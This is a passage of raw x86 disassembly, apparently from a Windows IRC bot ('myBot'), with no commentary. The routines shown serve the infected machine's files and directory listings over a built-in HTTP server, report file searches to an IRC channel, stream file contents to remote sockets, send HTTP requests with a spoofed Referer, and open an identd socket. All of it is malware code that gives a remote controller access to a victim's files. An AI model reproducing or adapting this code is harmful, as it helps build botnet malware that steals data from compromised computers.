loc_406800: ; CODE XREF: .text:0040654C�j
; .text:00406572�j ...
mov esi, [ebp-4]
inc esi
cmp esi, [ebp-8]
mov [ebp-4], esi
jbe loc_40653C
jmp loc_406506
; ---------------------------------------------------------------------------
loc_406815: ; CODE XREF: .text:00406531�j
mov edi, [ebp-0Ch]
xor ebx, ebx
loc_40681A: ; CODE XREF: .text:00406499�j
; .text:004064C1�j ...
call dword_4915F0 ; WSAGetLastError
push eax
lea eax, [ebp-8F0h]
push offset unk_42BF74
push eax
call sub_416821
add esp, 0Ch
cmp [ebp-24Ch], ebx
jnz short loc_406860
push ebx
lea eax, [ebp-8F0h]
push dword ptr [ebp-250h]
push eax
lea eax, [ebp-5E8h]
push eax
push dword ptr [ebp-5ECh]
call sub_4010D2
add esp, 14h
loc_406860: ; CODE XREF: .text:0040683B�j
lea eax, [ebp-8F0h]
push eax
call sub_401014
pop ecx
push edi
call dword_4916F4 ; closesocket
push dword ptr [ebp-254h]
call sub_4012A3
pop ecx
push ebx
call ds:dword_495334 ; ExitThread
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 116h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4069A0: ; CODE XREF: sub_401181�j
push ebp
mov ebp, esp
mov eax, 1654h
call sub_416880
mov eax, [ebp+8]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp-44Ch]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp-3C8h]
push eax
lea eax, [ebp-550h]
push eax
call sub_416821
lea eax, [ebp-2C4h]
push eax
lea eax, [ebp-654h]
push eax
call sub_416821
xor edi, edi
add esp, 10h
cmp [ebp-0A4h], edi
jz short loc_406A05
push offset aTextHtml ; "text/html"
jmp short loc_406A0A
; ---------------------------------------------------------------------------
loc_406A05: ; CODE XREF: .text:004069FC�j
push offset aApplicationOct ; "application/octet-stream"
loc_406A0A: ; CODE XREF: .text:00406A03�j
lea eax, [ebp-9Ch]
push eax
call sub_416821
pop ecx
lea eax, [ebp-68h]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_49536C ; GetDateFormatA
lea eax, [ebp-20h]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_495368 ; GetTimeFormatA
lea eax, [ebp-20h]
cmp dword ptr [ebp-0B8h], 0FFFFFFFFh
push eax
lea eax, [ebp-68h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-68h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-68h]
push eax
jnz short loc_406A83
lea eax, [ebp-9Ch]
push eax
lea eax, [ebp-1654h]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_416821
add esp, 24h
jmp short loc_406AA4
; ---------------------------------------------------------------------------
loc_406A83: ; CODE XREF: .text:00406A64�j
push dword ptr [ebp-0B8h]
lea eax, [ebp-9Ch]
push eax
lea eax, [ebp-1654h]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_416821
add esp, 28h
loc_406AA4: ; CODE XREF: .text:00406A81�j
lea eax, [ebp-1654h]
push edi
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp-1654h]
push eax
push dword ptr [ebp-44Ch]
call dword_4916AC ; send
cmp [ebp-0A4h], edi
jnz short loc_406AE4
lea eax, [ebp-550h]
push eax
push dword ptr [ebp-44Ch]
call sub_401203
pop ecx
pop ecx
jmp short loc_406B01
; ---------------------------------------------------------------------------
loc_406AE4: ; CODE XREF: .text:00406ACC�j
lea eax, [ebp-654h]
push eax
push edi
push dword ptr [ebp-44Ch]
lea eax, [ebp-550h]
push eax
call sub_401118
add esp, 10h
loc_406B01: ; CODE XREF: .text:00406AE2�j
push dword ptr [ebp-44Ch]
call dword_4916F4 ; closesocket
push dword ptr [ebp-0B4h]
call sub_4012A3
pop ecx
push edi
call ds:dword_495334 ; ExitThread
pop edi
pop esi
; ---------------------------------------------------------------------------
db 60h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B82 proc near ; CODE XREF: sub_401325�j
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_415CA0
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_406BB8
push eax
push offset aS_5 ; "\\%s"
jmp short loc_406BC1
; ---------------------------------------------------------------------------
loc_406BB8: ; CODE XREF: sub_406B82+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_2 ; "%s"
loc_406BC1: ; CODE XREF: sub_406B82+34�j
lea eax, [ebp+var_10C]
push eax
call sub_416821
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_4158E0
test eax, eax
pop ecx
jbe short loc_406C5C
mov [ebp+arg_8], 2
loc_406BEC: ; CODE XREF: sub_406B82+D8�j
lea eax, [ebp+var_10C]
push eax
call sub_4158E0
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_406C2C
cmp [ebp+esi+var_10C], 25h
jnz short loc_406C2C
cmp [ebp+esi+var_10B], 32h
jnz short loc_406C2C
cmp [ebp+esi+var_10A], 30h
jnz short loc_406C2C
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_406C46
; ---------------------------------------------------------------------------
loc_406C2C: ; CODE XREF: sub_406B82+7A�j
; sub_406B82+84�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_406C3C
push 5Ch
pop eax
jmp short loc_406C3F
; ---------------------------------------------------------------------------
loc_406C3C: ; CODE XREF: sub_406B82+B3�j
movsx eax, al
loc_406C3F: ; CODE XREF: sub_406B82+B8�j
mov [ebp+ebx+var_210], al
loc_406C46: ; CODE XREF: sub_406B82+A8�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_4158E0
cmp esi, eax
pop ecx
jb short loc_406BEC
loc_406C5C: ; CODE XREF: sub_406B82+61�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS_0 ; "%s%s"
push eax
call sub_416821
lea eax, [ebp+var_314]
push offset dword_42C2E0
push eax
call sub_4176C0
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:dword_495374 ; GetFileAttributesA
push 1
cmp eax, 10h
pop esi
jz short loc_406CAA
cmp eax, 0FFFFFFFFh
jnz short loc_406CAD
push [ebp+arg_0]
jmp short loc_406D29
; ---------------------------------------------------------------------------
loc_406CAA: ; CODE XREF: sub_406B82+11C�j
mov [ebp+var_4], esi
loc_406CAD: ; CODE XREF: sub_406B82+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_406CBA
mov [ebp+var_4], esi
loc_406CBA: ; CODE XREF: sub_406B82+133�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_406D34
cmp [ebp+arg_C], edi
jz short loc_406D28
lea eax, [ebp+var_314]
push offset dword_42C2DC
push eax
call sub_4175E0
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416821
lea eax, [ebp+var_210]
push eax
call sub_40118B
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_416821
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_406D83
; ---------------------------------------------------------------------------
loc_406D28: ; CODE XREF: sub_406B82+14F�j
push ebx
loc_406D29: ; CODE XREF: sub_406B82+126�j
call dword_4916F4 ; closesocket
jmp loc_406E2B
; ---------------------------------------------------------------------------
loc_406D34: ; CODE XREF: sub_406B82+14A�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call ds:dword_495360 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_406D83
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416821
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:dword_495370 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_495358 ; CloseHandle
loc_406D83: ; CODE XREF: sub_406B82+1A4�j
; sub_406B82+1CF�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_42C294
push eax
call sub_416821
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_40105F
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43E924[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_401181
push edi
push edi
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43E934[ecx], eax
jz short loc_406DFD
loc_406DEB: ; CODE XREF: sub_406B82+279�j
cmp [ebp+var_318], edi
jnz short loc_406E2B
push 5
call ds:dword_495324 ; Sleep
jmp short loc_406DEB
; ---------------------------------------------------------------------------
loc_406DFD: ; CODE XREF: sub_406B82+267�j
push ebx
call dword_4916F4 ; closesocket
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset unk_42C244
push eax
call sub_416821
lea eax, [ebp+var_8C4]
push eax
call sub_401014
add esp, 10h
loc_406E2B: ; CODE XREF: sub_406B82+1AD�j
; sub_406B82+26F�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_406B82 endp
; ---------------------------------------------------------------------------
db 0ACh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406EDE proc near ; CODE XREF: sub_401118�j
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_415CA0
mov edi, [ebp+arg_0]
push offset dword_42C2E0
push edi
call sub_4176C0
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_406F3D
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_4163D7
add esp, 14h
jmp loc_40703A
; ---------------------------------------------------------------------------
loc_406F3D: ; CODE XREF: sub_406EDE+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_407020
call sub_4158E0
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4163D7
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4163D7
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
push edi
call sub_4158E0
push 3Ch
push 96h
mov byte ptr [eax+edi], 2Ah
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4163D7
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4163D7
add esp, 0Ch
jmp short loc_40703A
; ---------------------------------------------------------------------------
loc_407020: ; CODE XREF: sub_406EDE+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_4163D7
add esp, 10h
loc_40703A: ; CODE XREF: sub_406EDE+5A�j
; sub_406EDE+140�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
cmp [ebp+arg_C], ebx
jz short loc_4070D2
push [ebp+arg_C]
call sub_4158E0
cmp eax, 2
pop ecx
jbe short loc_4070D2
push [ebp+arg_C]
call sub_4158E0
sub eax, 3
pop ecx
jz short loc_407086
loc_40707A: ; CODE XREF: sub_406EDE+1A6�j
; DATA XREF: .data:0042A968�o ...
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_407086
dec eax
jnz short loc_40707A
loc_407086: ; CODE XREF: sub_406EDE+19A�j
; sub_406EDE+1A3�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_416A10
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4163D7
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
loc_4070D2: ; CODE XREF: sub_406EDE+17E�j
; sub_406EDE+18C�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:dword_495388 ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call ds:dword_495384 ; FindNextFileA
test eax, eax
jz loc_4074C3
mov edi, 1FFh
loc_4070FE: ; CODE XREF: sub_406EDE+5DF�j
cmp [ebp+var_388], ebx
jz loc_4074AB
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_4074AB
lea eax, [ebp+var_35C]
push offset a__0 ; "."
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_4074AB
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_495380 ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_49537C ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_407173
mov ecx, offset aAm ; "AM"
loc_407173: ; CODE XREF: sub_406EDE+28E�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_40717F
sub eax, 0Ch
loc_40717F: ; CODE XREF: sub_406EDE+29C�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_416821
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_40732C
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_407200
lea eax, [ebp+var_35C]
push eax
push offset aS_1 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_4163D7
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi
push eax
call sub_4163D7
add esp, 28h
jmp loc_40747C
; ---------------------------------------------------------------------------
loc_407200: ; CODE XREF: sub_406EDE+2DB�j
cmp [ebp+arg_C], ebx
jz loc_4072EA
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_4163D7
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_1 ; "%s%s/"
push edi
push eax
call sub_4163D7
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
lea eax, [ebp+var_35C]
push eax
call sub_4158E0
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_4072A0
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4072A5
; ---------------------------------------------------------------------------
loc_4072A0: ; CODE XREF: sub_406EDE+3B9�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4072A5: ; CODE XREF: sub_406EDE+3C0�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_4163D7
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_40746D
; ---------------------------------------------------------------------------
loc_4072EA: ; CODE XREF: sub_406EDE+325�j
lea eax, [ebp+var_35C]
push eax
push offset aS_1 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_4163D7
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_407317: ; CODE XREF: sub_406EDE+476�j
lea eax, [ebp+var_248]
push esi
push eax
call sub_4163D7
add esp, 24h
jmp loc_40747C
; ---------------------------------------------------------------------------
loc_40732C: ; CODE XREF: sub_406EDE+2CF�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_407356
push ebx
push [ebp+var_368]
call sub_401217
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_407317
; ---------------------------------------------------------------------------
loc_407356: ; CODE XREF: sub_406EDE+454�j
cmp [ebp+arg_C], ebx
jz loc_407456
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_4163D7
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_0 ; "%s%s"
push edi
push eax
call sub_4163D7
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
lea eax, [ebp+var_35C]
push eax
call sub_4158E0
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_4073F6
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_4073FB
; ---------------------------------------------------------------------------
loc_4073F6: ; CODE XREF: sub_406EDE+50F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_4073FB: ; CODE XREF: sub_406EDE+516�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_4163D7
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_248]
push edi
push eax
call sub_4163D7
add esp, 1Ch
jmp short loc_40747C
; ---------------------------------------------------------------------------
loc_407456: ; CODE XREF: sub_406EDE+47B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi
loc_40746D: ; CODE XREF: sub_406EDE+407�j
lea eax, [ebp+var_248]
push eax
call sub_4163D7
add esp, 18h
loc_40747C: ; CODE XREF: sub_406EDE+31D�j
; sub_406EDE+449�j ...
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
cmp [ebp+arg_8], ebx
jz short loc_4074AB
push 7D0h
call ds:dword_495324 ; Sleep
loc_4074AB: ; CODE XREF: sub_406EDE+226�j
; sub_406EDE+241�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call ds:dword_495384 ; FindNextFileA
test eax, eax
jnz loc_4070FE
loc_4074C3: ; CODE XREF: sub_406EDE+215�j
push [ebp+arg_0]
call ds:dword_495378 ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_407506
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_401217
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_401217
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_416821
add esp, 14h
jmp short loc_40753A
; ---------------------------------------------------------------------------
loc_407506: ; CODE XREF: sub_406EDE+5F1�j
cmp [ebp+arg_C], ebx
jz short loc_407520
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_416821
pop ecx
pop ecx
jmp short loc_40753A
; ---------------------------------------------------------------------------
loc_407520: ; CODE XREF: sub_406EDE+62B�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_416821
add esp, 10h
loc_40753A: ; CODE XREF: sub_406EDE+626�j
; sub_406EDE+640�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4916AC ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_406EDE endp
; ---------------------------------------------------------------------------
db 1A0h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407700 proc near ; CODE XREF: sub_401203�j
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:dword_495360 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4077B8
push esi
push ebx
call ds:dword_495370 ; GetFileSize
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_4077B1
loc_407745: ; CODE XREF: sub_407700+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_415CA0
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_407762
mov edi, [ebp+arg_4]
loc_407762: ; CODE XREF: sub_407700+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:dword_495390 ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call ds:dword_49538C ; ReadFile
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4077AC
call dword_4915F0 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4077B1
xor eax, eax
loc_4077AC: ; CODE XREF: sub_407700+9B�j
sub [ebp+arg_4], eax
jnz short loc_407745
loc_4077B1: ; CODE XREF: sub_407700+43�j
; sub_407700+A8�j
push ebx
call ds:dword_495358 ; CloseHandle
loc_4077B8: ; CODE XREF: sub_407700+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_407700 endp
; ---------------------------------------------------------------------------
db 2Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4077EC proc near ; CODE XREF: sub_40118B�j
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_4158E0
test eax, eax
pop ecx
jbe short loc_407815
loc_4077FF: ; CODE XREF: sub_4077EC+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_407809
mov byte ptr [esi+edi], 2Fh
loc_407809: ; CODE XREF: sub_4077EC+17�j
push edi
inc esi
call sub_4158E0
cmp esi, eax
pop ecx
jb short loc_4077FF
loc_407815: ; CODE XREF: sub_4077EC+11�j
mov eax, edi
pop edi
pop esi
retn
sub_4077EC endp
; ---------------------------------------------------------------------------
db 0Bh dup(0CCh)
; ---------------------------------------------------------------------------
loc_407825: ; CODE XREF: .text:00401145�j
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp-4A0h]
push edi
push eax
push 101h
call dword_4915D4 ; WSAStartup
push 6
push 1
push 2
call dword_4916DC ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp-10h]
push edi
push eax
call sub_415CA0
add esp, 0Ch
mov word ptr [ebp-10h], 2
push dword ptr [ebp+1Ch]
call dword_49165C ; htons
push dword ptr [ebp+18h]
mov [ebp-0Eh], ax
call sub_4011C2
pop ecx
mov [ebp-0Ch], eax
lea eax, [ebp-10h]
push 10h
push eax
push ebx
call dword_491604 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_407902
mov eax, [ebp+28h]
cmp eax, edi
jnz short loc_40789E
mov eax, offset byte_4370BC
loc_40789E: ; CODE XREF: .text:00407897�j
push esi
mov esi, 100h
push dword ptr [ebp+18h]
push eax
lea eax, [ebp-110h]
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_4163D7
add esp, 1Ch
lea eax, [ebp-110h]
push edi
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp-110h]
push eax
push ebx
call dword_4916AC ; send
push esi
lea eax, [ebp-110h]
push edi
push eax
call sub_415960
add esp, 0Ch
lea eax, [ebp-110h]
push edi
push esi
push eax
push ebx
call dword_491674 ; recv
pop esi
loc_407902: ; CODE XREF: .text:00407890�j
push ebx
call dword_4916F4 ; closesocket
call dword_4915BC ; WSACleanup
lea eax, [ebp-110h]
push eax
lea eax, [ebp-310h]
push eax
call sub_416821
cmp [ebp+14h], edi
pop ecx
pop ecx
jnz short loc_407942
push edi
lea eax, [ebp-310h]
push dword ptr [ebp+10h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_4010D2
add esp, 14h
loc_407942: ; CODE XREF: .text:00407927�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 48h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40798E: ; CODE XREF: sub_401195�j
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi
lea eax, [ebp-1Ch]
push esi
push eax
mov [ebp-8], esi
call sub_415CA0
add esp, 0Ch
mov word ptr [ebp-1Ch], 2
push 71h
call dword_49165C ; htons
push esi
push 1
push 2
mov [ebp-1Ah], ax
mov [ebp-18h], esi
call dword_4916DC ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_407AEF
mov eax, [ebp+8]
push edi
